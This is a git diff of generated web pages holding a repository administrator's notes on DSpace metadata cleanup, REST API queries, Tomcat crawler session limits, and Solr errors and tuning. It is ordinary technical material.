+dspace=# select distinct text_value, text_lang from metadatavalue where resource_type_id=2 and metadata_field_id=203 and text_value='SEEDS';
text_value | text_lang
------------+-----------
SEEDS |
@@ -215,23 +215,23 @@ COPY 22
So basically, the text language here could be null, blank, or en_US
To query metadata with these properties, you can do:
-$ curl -s -H "accept: application/json" -H "Content-Type: application/json" -X POST "http://localhost:8080/rest/items/find-by-metadata-field" -d '{"key": "cg.subject.ilri","value": "SEEDS"}' | jq length
+$ curl -s -H "accept: application/json" -H "Content-Type: application/json" -X POST "http://localhost:8080/rest/items/find-by-metadata-field" -d '{"key": "cg.subject.ilri","value": "SEEDS"}' | jq length
55
-$ curl -s -H "accept: application/json" -H "Content-Type: application/json" -X POST "http://localhost:8080/rest/items/find-by-metadata-field" -d '{"key": "cg.subject.ilri","value": "SEEDS", "language":""}' | jq length
+$ curl -s -H "accept: application/json" -H "Content-Type: application/json" -X POST "http://localhost:8080/rest/items/find-by-metadata-field" -d '{"key": "cg.subject.ilri","value": "SEEDS", "language":""}' | jq length
34
-$ curl -s -H "accept: application/json" -H "Content-Type: application/json" -X POST "http://localhost:8080/rest/items/find-by-metadata-field" -d '{"key": "cg.subject.ilri","value": "SEEDS", "language":"en_US"}' | jq length
+$ curl -s -H "accept: application/json" -H "Content-Type: application/json" -X POST "http://localhost:8080/rest/items/find-by-metadata-field" -d '{"key": "cg.subject.ilri","value": "SEEDS", "language":"en_US"}' | jq length
- The results (55+34=89) don’t seem to match those from the database:
-dspace=# select count(text_value) from metadatavalue where resource_type_id=2 and metadata_field_id=203 and text_value='SEEDS' and text_lang is null;
+dspace=# select count(text_value) from metadatavalue where resource_type_id=2 and metadata_field_id=203 and text_value='SEEDS' and text_lang is null;
count
-------
15
-dspace=# select count(text_value) from metadatavalue where resource_type_id=2 and metadata_field_id=203 and text_value='SEEDS' and text_lang='';
+dspace=# select count(text_value) from metadatavalue where resource_type_id=2 and metadata_field_id=203 and text_value='SEEDS' and text_lang='';
count
-------
4
-dspace=# select count(text_value) from metadatavalue where resource_type_id=2 and metadata_field_id=203 and text_value='SEEDS' and text_lang='en_US';
+dspace=# select count(text_value) from metadatavalue where resource_type_id=2 and metadata_field_id=203 and text_value='SEEDS' and text_lang='en_US';
count
-------
66
@@ -267,27 +267,27 @@ COPY 14
- Perhaps we need to fix them all in batch, or experiment with fixing only certain metadatavalues:
-dspace=# update metadatavalue set text_lang='en_US' where resource_type_id=2 and metadata_field_id=203 and text_value='SEEDS';
+dspace=# update metadatavalue set text_lang='en_US' where resource_type_id=2 and metadata_field_id=203 and text_value='SEEDS';
UPDATE 85
- The fix-metadata.py script I have is meant for specific metadata values, so if I want to update some text_lang values I should just do it directly in the database
- For example, on a limited set:
-dspace=# update metadatavalue set text_lang=NULL where resource_type_id=2 and metadata_field_id=203 and text_value='LIVESTOCK' and text_lang='';
+dspace=# update metadatavalue set text_lang=NULL where resource_type_id=2 and metadata_field_id=203 and text_value='LIVESTOCK' and text_lang='';
UPDATE 420
- And assuming I want to do it for all fields:
-dspacetest=# update metadatavalue set text_lang=NULL where resource_type_id=2 and text_lang='';
+dspacetest=# update metadatavalue set text_lang=NULL where resource_type_id=2 and text_lang='';
UPDATE 183726
- After that restarted Tomcat and PostgreSQL (because I’m superstitious about caches) and now I see the following in REST API query:
-$ curl -s -H "accept: application/json" -H "Content-Type: application/json" -X POST "http://localhost:8080/rest/items/find-by-metadata-field" -d '{"key": "cg.subject.ilri","value": "SEEDS"}' | jq length
+$ curl -s -H "accept: application/json" -H "Content-Type: application/json" -X POST "http://localhost:8080/rest/items/find-by-metadata-field" -d '{"key": "cg.subject.ilri","value": "SEEDS"}' | jq length
71
-$ curl -s -H "accept: application/json" -H "Content-Type: application/json" -X POST "http://localhost:8080/rest/items/find-by-metadata-field" -d '{"key": "cg.subject.ilri","value": "SEEDS", "language":""}' | jq length
+$ curl -s -H "accept: application/json" -H "Content-Type: application/json" -X POST "http://localhost:8080/rest/items/find-by-metadata-field" -d '{"key": "cg.subject.ilri","value": "SEEDS", "language":""}' | jq length
0
-$ curl -s -H "accept: application/json" -H "Content-Type: application/json" -X POST "http://localhost:8080/rest/items/find-by-metadata-field" -d '{"key": "cg.subject.ilri","value": "SEEDS", "language":"en_US"}' | jq length
+$ curl -s -H "accept: application/json" -H "Content-Type: application/json" -X POST "http://localhost:8080/rest/items/find-by-metadata-field" -d '{"key": "cg.subject.ilri","value": "SEEDS", "language":"en_US"}' | jq length
- Not sure what’s going on, but Discovery shows 83 values, and database shows 85, so I’m going to reindex Discovery just in case
@@ -298,7 +298,7 @@ $ curl -s -H "accept: application/json" -H "Content-Type: applica
So there is apparently this Tomcat native way to limit web crawlers to one session: Crawler Session Manager
After adding that to server.xml, bots matching the pattern in the configuration will all use ONE session, just like normal users:
-$ http --print h https://dspacetest.cgiar.org 'User-Agent:Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'
+$ http --print h https://dspacetest.cgiar.org 'User-Agent:Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'
HTTP/1.1 200 OK
Connection: keep-alive
Content-Encoding: gzip
@@ -312,7 +312,7 @@ Vary: Accept-Encoding
X-Cocoon-Version: 2.2.0
X-Robots-Tag: none
-$ http --print h https://dspacetest.cgiar.org 'User-Agent:Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'
+$ http --print h https://dspacetest.cgiar.org 'User-Agent:Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'
HTTP/1.1 200 OK
Connection: keep-alive
Content-Encoding: gzip
@@ -336,7 +336,7 @@ X-Cocoon-Version: 2.2.0
- Seems the default regex doesn’t catch Baidu, though:
-$ http --print h https://dspacetest.cgiar.org 'User-Agent:Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)'
+$ http --print h https://dspacetest.cgiar.org 'User-Agent:Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)'
HTTP/1.1 200 OK
Connection: keep-alive
Content-Encoding: gzip
@@ -349,7 +349,7 @@ Transfer-Encoding: chunked
Vary: Accept-Encoding
X-Cocoon-Version: 2.2.0
-$ http --print h https://dspacetest.cgiar.org 'User-Agent:Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)'
+$ http --print h https://dspacetest.cgiar.org 'User-Agent:Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)'
HTTP/1.1 200 OK
Connection: keep-alive
Content-Encoding: gzip
@@ -365,17 +365,17 @@ X-Cocoon-Version: 2.2.0
Adding Baiduspider to the list of user agents seems to work, and the final configuration should be:
<!-- Crawler Session Manager Valve helps mitigate damage done by web crawlers -->
-<Valve className="org.apache.catalina.valves.CrawlerSessionManagerValve"
- crawlerUserAgents=".*[bB]ot.*|.*Yahoo! Slurp.*|.*Feedfetcher-Google.*|.*Baiduspider.*" />
+<Valve className="org.apache.catalina.valves.CrawlerSessionManagerValve"
+ crawlerUserAgents=".*[bB]ot.*|.*Yahoo! Slurp.*|.*Feedfetcher-Google.*|.*Baiduspider.*" />
- Looking at the bots that were active yesterday it seems the above regex should be sufficient:
-$ grep -o -E 'Mozilla/5\.0 \(compatible;.*\"' /var/log/nginx/access.log | sort | uniq
-Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)" "-"
-Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)" "-"
-Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "-"
-Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)" "-"
-Mozilla/5.0 (compatible; YandexImages/3.0; +http://yandex.com/bots)" "-"
+$ grep -o -E 'Mozilla/5\.0 \(compatible;.*\"' /var/log/nginx/access.log | sort | uniq
+Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)" "-"
+Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)" "-"
+Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "-"
+Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)" "-"
+Mozilla/5.0 (compatible; YandexImages/3.0; +http://yandex.com/bots)" "-"
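As a quick sanity check of the claim above, this Python sketch runs the same pattern against the five user agents from the grep output. It assumes the valve compares the pattern against the whole User-Agent header, which `re.fullmatch` imitates here. The browser user agent used as a negative control is a made-up example, not taken from the logs.

```python
import re

# Pattern copied from the crawlerUserAgents attribute in the Valve config.
CRAWLER_UA = re.compile(
    r".*[bB]ot.*|.*Yahoo! Slurp.*|.*Feedfetcher-Google.*|.*Baiduspider.*"
)

# User agents from the nginx log excerpt (trailing log fields removed).
BOT_AGENTS = [
    "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)",
    "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)",
    "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)",
    "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)",
    "Mozilla/5.0 (compatible; YandexImages/3.0; +http://yandex.com/bots)",
]

# Hypothetical browser user agent, used only as a negative control.
BROWSER_AGENT = "Mozilla/5.0 (X11; Linux x86_64; rv:50.0) Gecko/20100101 Firefox/50.0"


def is_crawler(user_agent: str) -> bool:
    # Whole-string match (assumption about how the valve applies the pattern).
    return CRAWLER_UA.fullmatch(user_agent) is not None


unmatched = [ua for ua in BOT_AGENTS if not is_crawler(ua)]
print("Bots not covered by the pattern:", unmatched)
print("Browser treated as crawler:", is_crawler(BROWSER_AGENT))
```

Note that YandexImages is only caught because its URL happens to contain "bots", so a future agent without "bot" anywhere in its string would need its own alternative in the pattern.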
- Neat maven trick to exclude some modules from being built:
@@ -393,9 +393,9 @@ COPY 2515
Send a message to users of the CGSpace REST API to notify them of upcoming upgrade so they can test their apps against DSpace Test
Test and update old, non-HTTPS links to the CCAFS website in CGSpace metadata:
-dspacetest=# update metadatavalue set text_value = regexp_replace(text_value, 'http://ccafs.cgiar.org','https://ccafs.cgiar.org') where resource_type_id=2 and text_value like '%http://ccafs.cgiar.org%';
+dspacetest=# update metadatavalue set text_value = regexp_replace(text_value, 'http://ccafs.cgiar.org','https://ccafs.cgiar.org') where resource_type_id=2 and text_value like '%http://ccafs.cgiar.org%';
UPDATE 164
-dspace=# update metadatavalue set text_value = regexp_replace(text_value, 'http://ccafs.cgiar.org','https://ccafs.cgiar.org') where resource_type_id=2 and text_value like '%http://ccafs.cgiar.org%';
+dspace=# update metadatavalue set text_value = regexp_replace(text_value, 'http://ccafs.cgiar.org','https://ccafs.cgiar.org') where resource_type_id=2 and text_value like '%http://ccafs.cgiar.org%';
UPDATE 7
- Had to run it twice to get all (not sure about “global” regex in PostgreSQL)
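On the "global" question: PostgreSQL's `regexp_replace` replaces only the first match in each value unless the flag `g` is passed as a fourth argument, which would explain needing a second run for values that contain the old URL more than once. The Python sketch below imitates both behaviours with `re.sub`. The sample string is invented for illustration and the function names are hypothetical.

```python
import re

OLD_URL = r"http://ccafs\.cgiar\.org"
NEW_URL = "https://ccafs.cgiar.org"


def replace_first(text: str) -> str:
    # Like regexp_replace(text, old, new): only the first match changes.
    return re.sub(OLD_URL, NEW_URL, text, count=1)


def replace_all(text: str) -> str:
    # Like regexp_replace(text, old, new, 'g'): every match changes.
    return re.sub(OLD_URL, NEW_URL, text)


# Invented metadata value that mentions the old URL twice.
sample = "See http://ccafs.cgiar.org/a and http://ccafs.cgiar.org/b"

once = replace_first(sample)
twice = replace_first(once)

print(once)
print(twice)
print(replace_all(sample))
```

Running the non-global replacement twice gives the same result as one global pass for this sample, which matches the experience of having to run the UPDATE twice.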
@@ -404,11 +404,11 @@ UPDATE 7
- I’m debating forcing the re-generation of ALL thumbnails, since some come from DSpace 3 and 4 when the thumbnailing wasn’t as good
- The results were very good, I think that after we upgrade to 5.5 I will do it, perhaps one community / collection at a time:
-$ [dspace]/bin/dspace filter-media -f -i 10568/67156 -p "ImageMagick PDF Thumbnail"
+$ [dspace]/bin/dspace filter-media -f -i 10568/67156 -p "ImageMagick PDF Thumbnail"
- In related news, I’m looking at thumbnails of thumbnails (the ones we uploaded manually before, and now DSpace’s media filter has made thumbnails of THEM):
-dspace=# select text_value from metadatavalue where text_value like '%.jpg.jpg';
+dspace=# select text_value from metadatavalue where text_value like '%.jpg.jpg';
- I’m not sure if there’s anything we can do, actually, because we would have to remove those from the thumbnail bundles, and replace them with the regular JPGs from the content bundle, and then remove them from the assetstore…
@@ -464,7 +464,7 @@ UPDATE 7
One user says they are still getting a blank page when they log in (just CGSpace header, but no community list)
Looking at the Catalina logs I see there is some super long-running indexing process going on:
-INFO: FrameworkServlet 'oai': initialization completed in 2600 ms
+INFO: FrameworkServlet 'oai': initialization completed in 2600 ms
[> ] 0% time remaining: Calculating... timestamp: 2016-11-28 03:00:18
[> ] 0% time remaining: 11 hour(s) 57 minute(s) 46 seconds. timestamp: 2016-11-28 03:00:19
[> ] 0% time remaining: 23 hour(s) 4 minute(s) 28 seconds. timestamp: 2016-11-28 03:00:19
@@ -497,7 +497,7 @@ $ /home/dspacetest.cgiar.org/bin/dspace registry-loader -metadata /home/dspacete
2016-11-29 07:56:36,545 INFO com.atmire.utils.UpdateSolrStatsMetadata @ Start processing item 10568/50391 id:51744
2016-11-29 07:56:36,545 INFO com.atmire.utils.UpdateSolrStatsMetadata @ Processing item stats
2016-11-29 07:56:36,583 INFO com.atmire.utils.UpdateSolrStatsMetadata @ Solr metadata up-to-date
-2016-11-29 07:56:36,583 INFO com.atmire.utils.UpdateSolrStatsMetadata @ Processing item's bitstream stats
+2016-11-29 07:56:36,583 INFO com.atmire.utils.UpdateSolrStatsMetadata @ Processing item's bitstream stats
2016-11-29 07:56:36,608 INFO com.atmire.utils.UpdateSolrStatsMetadata @ Solr metadata up-to-date
2016-11-29 07:56:36,701 INFO org.dspace.app.xmlui.aspect.discovery.SidebarFacetsTransformer @ facets for scope, null: 23
2016-11-29 07:56:36,747 ERROR org.dspace.app.xmlui.aspect.discovery.SidebarFacetsTransformer @ Error while searching for sidebar facets
diff --git a/docs/2016-12/index.html b/docs/2016-12/index.html
index 66713f242..f68cfbdf2 100644
--- a/docs/2016-12/index.html
+++ b/docs/2016-12/index.html
@@ -12,11 +12,11 @@
CGSpace was down for five hours in the morning while I was sleeping
While looking in the logs for errors, I see tons of warnings about Atmire MQM:
-2016-12-02 03:00:32,352 WARN com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=CREATE, SubjectType=BUNDLE, SubjectID=70316, ObjectType=(Unknown), ObjectID=-1, TimeStamp=1480647632305, dispatcher=1544803905, detail=[null], transactionID="TX157907838689377964651674089851855413607")
-2016-12-02 03:00:32,353 WARN com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=MODIFY_METADATA, SubjectType=BUNDLE, SubjectID =70316, ObjectType=(Unknown), ObjectID=-1, TimeStamp=1480647632309, dispatcher=1544803905, detail="dc.title", transactionID="TX157907838689377964651674089851855413607")
-2016-12-02 03:00:32,353 WARN com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=ADD, SubjectType=ITEM, SubjectID=80044, Object Type=BUNDLE, ObjectID=70316, TimeStamp=1480647632311, dispatcher=1544803905, detail="THUMBNAIL", transactionID="TX157907838689377964651674089851855413607")
-2016-12-02 03:00:32,353 WARN com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=ADD, SubjectType=BUNDLE, SubjectID=70316, Obje ctType=BITSTREAM, ObjectID=86715, TimeStamp=1480647632318, dispatcher=1544803905, detail="-1", transactionID="TX157907838689377964651674089851855413607")
-2016-12-02 03:00:32,353 WARN com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=MODIFY, SubjectType=ITEM, SubjectID=80044, ObjectType=(Unknown), ObjectID=-1, TimeStamp=1480647632351, dispatcher=1544803905, detail=[null], transactionID="TX157907838689377964651674089851855413607")
+2016-12-02 03:00:32,352 WARN com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=CREATE, SubjectType=BUNDLE, SubjectID=70316, ObjectType=(Unknown), ObjectID=-1, TimeStamp=1480647632305, dispatcher=1544803905, detail=[null], transactionID="TX157907838689377964651674089851855413607")
+2016-12-02 03:00:32,353 WARN com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=MODIFY_METADATA, SubjectType=BUNDLE, SubjectID =70316, ObjectType=(Unknown), ObjectID=-1, TimeStamp=1480647632309, dispatcher=1544803905, detail="dc.title", transactionID="TX157907838689377964651674089851855413607")
+2016-12-02 03:00:32,353 WARN com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=ADD, SubjectType=ITEM, SubjectID=80044, Object Type=BUNDLE, ObjectID=70316, TimeStamp=1480647632311, dispatcher=1544803905, detail="THUMBNAIL", transactionID="TX157907838689377964651674089851855413607")
+2016-12-02 03:00:32,353 WARN com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=ADD, SubjectType=BUNDLE, SubjectID=70316, Obje ctType=BITSTREAM, ObjectID=86715, TimeStamp=1480647632318, dispatcher=1544803905, detail="-1", transactionID="TX157907838689377964651674089851855413607")
+2016-12-02 03:00:32,353 WARN com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=MODIFY, SubjectType=ITEM, SubjectID=80044, ObjectType=(Unknown), ObjectID=-1, TimeStamp=1480647632351, dispatcher=1544803905, detail=[null], transactionID="TX157907838689377964651674089851855413607")
I see thousands of them in the logs for the last few months, so it’s not related to the DSpace 5.5 upgrade
I’ve raised a ticket with Atmire to ask
@@ -36,17 +36,17 @@ Another worrying error from dspace.log is:
CGSpace was down for five hours in the morning while I was sleeping
While looking in the logs for errors, I see tons of warnings about Atmire MQM:
-2016-12-02 03:00:32,352 WARN com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=CREATE, SubjectType=BUNDLE, SubjectID=70316, ObjectType=(Unknown), ObjectID=-1, TimeStamp=1480647632305, dispatcher=1544803905, detail=[null], transactionID="TX157907838689377964651674089851855413607")
-2016-12-02 03:00:32,353 WARN com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=MODIFY_METADATA, SubjectType=BUNDLE, SubjectID =70316, ObjectType=(Unknown), ObjectID=-1, TimeStamp=1480647632309, dispatcher=1544803905, detail="dc.title", transactionID="TX157907838689377964651674089851855413607")
-2016-12-02 03:00:32,353 WARN com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=ADD, SubjectType=ITEM, SubjectID=80044, Object Type=BUNDLE, ObjectID=70316, TimeStamp=1480647632311, dispatcher=1544803905, detail="THUMBNAIL", transactionID="TX157907838689377964651674089851855413607")
-2016-12-02 03:00:32,353 WARN com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=ADD, SubjectType=BUNDLE, SubjectID=70316, Obje ctType=BITSTREAM, ObjectID=86715, TimeStamp=1480647632318, dispatcher=1544803905, detail="-1", transactionID="TX157907838689377964651674089851855413607")
-2016-12-02 03:00:32,353 WARN com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=MODIFY, SubjectType=ITEM, SubjectID=80044, ObjectType=(Unknown), ObjectID=-1, TimeStamp=1480647632351, dispatcher=1544803905, detail=[null], transactionID="TX157907838689377964651674089851855413607")
+2016-12-02 03:00:32,352 WARN com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=CREATE, SubjectType=BUNDLE, SubjectID=70316, ObjectType=(Unknown), ObjectID=-1, TimeStamp=1480647632305, dispatcher=1544803905, detail=[null], transactionID="TX157907838689377964651674089851855413607")
+2016-12-02 03:00:32,353 WARN com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=MODIFY_METADATA, SubjectType=BUNDLE, SubjectID =70316, ObjectType=(Unknown), ObjectID=-1, TimeStamp=1480647632309, dispatcher=1544803905, detail="dc.title", transactionID="TX157907838689377964651674089851855413607")
+2016-12-02 03:00:32,353 WARN com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=ADD, SubjectType=ITEM, SubjectID=80044, Object Type=BUNDLE, ObjectID=70316, TimeStamp=1480647632311, dispatcher=1544803905, detail="THUMBNAIL", transactionID="TX157907838689377964651674089851855413607")
+2016-12-02 03:00:32,353 WARN com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=ADD, SubjectType=BUNDLE, SubjectID=70316, Obje ctType=BITSTREAM, ObjectID=86715, TimeStamp=1480647632318, dispatcher=1544803905, detail="-1", transactionID="TX157907838689377964651674089851855413607")
+2016-12-02 03:00:32,353 WARN com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=MODIFY, SubjectType=ITEM, SubjectID=80044, ObjectType=(Unknown), ObjectID=-1, TimeStamp=1480647632351, dispatcher=1544803905, detail=[null], transactionID="TX157907838689377964651674089851855413607")
I see thousands of them in the logs for the last few months, so it’s not related to the DSpace 5.5 upgrade
I’ve raised a ticket with Atmire to ask
Another worrying error from dspace.log is:
"/>
-
+
@@ -137,11 +137,11 @@ Another worrying error from dspace.log is:
CGSpace was down for five hours in the morning while I was sleeping
While looking in the logs for errors, I see tons of warnings about Atmire MQM:
-2016-12-02 03:00:32,352 WARN com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=CREATE, SubjectType=BUNDLE, SubjectID=70316, ObjectType=(Unknown), ObjectID=-1, TimeStamp=1480647632305, dispatcher=1544803905, detail=[null], transactionID="TX157907838689377964651674089851855413607")
-2016-12-02 03:00:32,353 WARN com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=MODIFY_METADATA, SubjectType=BUNDLE, SubjectID =70316, ObjectType=(Unknown), ObjectID=-1, TimeStamp=1480647632309, dispatcher=1544803905, detail="dc.title", transactionID="TX157907838689377964651674089851855413607")
-2016-12-02 03:00:32,353 WARN com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=ADD, SubjectType=ITEM, SubjectID=80044, Object Type=BUNDLE, ObjectID=70316, TimeStamp=1480647632311, dispatcher=1544803905, detail="THUMBNAIL", transactionID="TX157907838689377964651674089851855413607")
-2016-12-02 03:00:32,353 WARN com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=ADD, SubjectType=BUNDLE, SubjectID=70316, Obje ctType=BITSTREAM, ObjectID=86715, TimeStamp=1480647632318, dispatcher=1544803905, detail="-1", transactionID="TX157907838689377964651674089851855413607")
-2016-12-02 03:00:32,353 WARN com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=MODIFY, SubjectType=ITEM, SubjectID=80044, ObjectType=(Unknown), ObjectID=-1, TimeStamp=1480647632351, dispatcher=1544803905, detail=[null], transactionID="TX157907838689377964651674089851855413607")
+2016-12-02 03:00:32,352 WARN com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=CREATE, SubjectType=BUNDLE, SubjectID=70316, ObjectType=(Unknown), ObjectID=-1, TimeStamp=1480647632305, dispatcher=1544803905, detail=[null], transactionID="TX157907838689377964651674089851855413607")
+2016-12-02 03:00:32,353 WARN com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=MODIFY_METADATA, SubjectType=BUNDLE, SubjectID =70316, ObjectType=(Unknown), ObjectID=-1, TimeStamp=1480647632309, dispatcher=1544803905, detail="dc.title", transactionID="TX157907838689377964651674089851855413607")
+2016-12-02 03:00:32,353 WARN com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=ADD, SubjectType=ITEM, SubjectID=80044, Object Type=BUNDLE, ObjectID=70316, TimeStamp=1480647632311, dispatcher=1544803905, detail="THUMBNAIL", transactionID="TX157907838689377964651674089851855413607")
+2016-12-02 03:00:32,353 WARN com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=ADD, SubjectType=BUNDLE, SubjectID=70316, Obje ctType=BITSTREAM, ObjectID=86715, TimeStamp=1480647632318, dispatcher=1544803905, detail="-1", transactionID="TX157907838689377964651674089851855413607")
+2016-12-02 03:00:32,353 WARN com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=MODIFY, SubjectType=ITEM, SubjectID=80044, ObjectType=(Unknown), ObjectID=-1, TimeStamp=1480647632351, dispatcher=1544803905, detail=[null], transactionID="TX157907838689377964651674089851855413607")
- I see thousands of them in the logs for the last few months, so it’s not related to the DSpace 5.5 upgrade
- I’ve raised a ticket with Atmire to ask
@@ -236,13 +236,13 @@ Caused by: java.lang.NoSuchMethodError: com.atmire.statistics.generator.DSpaceOb
- The first error I see in dspace.log this morning is:
-2016-12-02 03:00:46,656 ERROR org.dspace.authority.AuthorityValueFinder @ anonymous::Error while retrieving AuthorityValue from solr:query\colon; id\colon;"b0b541c1-ec15-48bf-9209-6dbe8e338cdc"
+2016-12-02 03:00:46,656 ERROR org.dspace.authority.AuthorityValueFinder @ anonymous::Error while retrieving AuthorityValue from solr:query\colon; id\colon;"b0b541c1-ec15-48bf-9209-6dbe8e338cdc"
org.apache.solr.client.solrj.SolrServerException: Server refused connection at: http://localhost:8081/solr/authority
- Looking through DSpace’s solr log I see that about 20 seconds before this, there were a few 30+ KiB solr queries
- The last logs here right before Solr became unresponsive (and right after I restarted it five hours later) were:
-2016-12-02 03:00:42,606 INFO org.apache.solr.core.SolrCore @ [statistics] webapp=/solr path=/select params={q=containerItem:72828+AND+type:0&shards=localhost:8081/solr/statistics-2010,localhost:8081/solr/statistics&fq=-isInternal:true&fq=-(author_mtdt:"CGIAR\+Institutional\+Learning\+and\+Change\+Initiative"++AND+subject_mtdt:"PARTNERSHIPS"+AND+subject_mtdt:"RESEARCH"+AND+subject_mtdt:"AGRICULTURE"+AND+subject_mtdt:"DEVELOPMENT"++AND+iso_mtdt:"en"+)&rows=0&wt=javabin&version=2} hits=0 status=0 QTime=19
+2016-12-02 03:00:42,606 INFO org.apache.solr.core.SolrCore @ [statistics] webapp=/solr path=/select params={q=containerItem:72828+AND+type:0&shards=localhost:8081/solr/statistics-2010,localhost:8081/solr/statistics&fq=-isInternal:true&fq=-(author_mtdt:"CGIAR\+Institutional\+Learning\+and\+Change\+Initiative"++AND+subject_mtdt:"PARTNERSHIPS"+AND+subject_mtdt:"RESEARCH"+AND+subject_mtdt:"AGRICULTURE"+AND+subject_mtdt:"DEVELOPMENT"++AND+iso_mtdt:"en"+)&rows=0&wt=javabin&version=2} hits=0 status=0 QTime=19
2016-12-02 08:28:23,908 INFO org.apache.solr.servlet.SolrDispatchFilter @ SolrDispatchFilter.init()
- DSpace’s own Solr logs don’t give IP addresses, so I will have to enable Nginx’s logging of `/solr` so I can see where this request came from
@@ -279,7 +279,7 @@ Result = The bitstream could not be found
- In other news, I’m looking at JVM settings from the Solr 4.10.2 release, from `bin/solr.in.sh`:
# These GC settings have shown to work well for a number of common Solr workloads
-GC_TUNE="-XX:-UseSuperWord \
+GC_TUNE="-XX:-UseSuperWord \
-XX:NewRatio=3 \
-XX:SurvivorRatio=4 \
-XX:TargetSurvivorRatio=90 \
@@ -296,7 +296,7 @@ GC_TUNE="-XX:-UseSuperWord \
-XX:CMSMaxAbortablePrecleanTime=6000 \
-XX:+CMSParallelRemarkEnabled \
-XX:+ParallelRefProcEnabled \
--XX:+AggressiveOpts"
+-XX:+AggressiveOpts"
- I need to try these because they are recommended by the Solr project itself
